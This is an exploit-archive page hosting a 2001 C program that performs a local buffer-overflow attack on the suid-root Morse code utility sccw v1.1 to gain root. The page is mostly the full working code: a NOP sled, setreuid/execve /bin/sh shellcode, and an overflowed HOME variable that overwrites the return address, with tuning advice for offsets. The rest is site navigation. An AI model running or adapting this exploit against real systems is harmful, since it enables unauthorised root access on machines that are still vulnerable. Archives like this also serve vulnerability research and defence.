hhp-sccw_smash.c

hhp-sccw_smash.c: Posted Sep 11, 2001; Authored by hhp, Cody Tubbs | Site hhp-programming.net; A local buffer overflow exploit for sccw v1.1 and maybe others. Will gain root[uid=0].; tags | overflow, local, root; SHA-256 | d1d7ed798702a71cff032aca0dd11741f3f394e38171c2bbc7a8a1538a4d3b4d; Download | Favorite | View

hhp-sccw_smash.c

/*
 *  (sccw v1.1*) root[uid=0] local buffer overflow exploit.
 *
 * Author: Cody Tubbs (loophole of hhp).
 *   Site: http://www.hhp-programming.net/
 *  Email: pigspigs@yahoo.com
 *   Date: 6/4/2001. 2:51:34AM CST.
 *
 *   Info: sccw is a Morse code practice utility, much like pileup.
 *         Is installed +s(suid root) by default.
 *
 *   Tested on Slackware 7.1 2.4.5 x86.
 */

#include <stdio.h>

#define PATH   "/bin/sccw" // Change if needed.
#define OFFSET -6226       // Worked for me, brute if fails.
#define ALIGN  1           // Should not need to be change.
#define NOP    0x90        // x86 No OPeration.
#define DBUF   300         // 256+4(ebp)+4(eip)=264.
static char shellcode[]=   // 30 bytes setreuid(0,0) execve /bin/sh shellcode.
   "\x31\xdb"              // xor     ebx, ebx     // By bighawk[@warfare.com]
   "\x31\xc9"              // xor     ecx, ecx
   "\x99"                  // cdq
   "\xb0\x46"              // mov     al, 70
   "\xcd\x80"              // int     80h
   "\x53"                  // push    ebx
   "\x68\x6e\x2f\x73\x68"  // push    dword 68732f6eh
   "\x68\x2f\x2f\x62\x69"  // push    dword 69622f2fh
   "\x89\xe3"              // mov     ebx, esp
   "\x52"                  // push    edx
   "\x53"                  // push    ebx
   "\x89\xe1"              // mov     ecx, esp
   "\xb0\x0b"              // mov     al, 11
   "\xcd\x80";             // int     80h

long get_sp(void){__asm__("movl %esp,%eax");}

void workit(char *heh){
 fprintf(stderr, "(sccw v1.1*) Local root[uid=0] exploit.\n");
 fprintf(stderr, "Author: Cody Tubbs (loophole of hhp).\n");
 fprintf(stderr, "Usage: %s [offset] [align(0..3)]\n", heh);
}

main(int argc, char **argv){
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];
 int i, offset, align;
 long address;
 workit(argv[0]);
 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){align=atoi(argv[2]);}else{align=ALIGN;}
 address=get_sp()-offset;
 if(align>0){for(i=0;i<align;i++){eipeip[i]=0x69;}}//0x69.DOOT:D
 for(i=align;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){buffer[i]=NOP;}
 memcpy(eipeip,"HOME=",5);putenv(eipeip);
 memcpy(buffer+i,shellcode,strlen(shellcode));
 memcpy(buffer,"SCCWEX=",7);putenv(buffer);
 fprintf(stderr, "Ret-addr %#x, offset: %d, align: %d.\n",address,offset,align);
 execlp(PATH,"sccw",0);
}
[i

Top Authors In Last 30 Days

Red Hat 305 files
Ubuntu 67 files
Debian 23 files
Gentoo 8 files
LiquidWorm 6 files
Apple 5 files
Google Security Research 5 files
Spencer McIntyre 3 files
Ivan Fratric 3 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

hhp-sccw_smash.c

hhp-sccw_smash.c

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

hhp-sccw_smash.c

Share This

hhp-sccw_smash.c

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems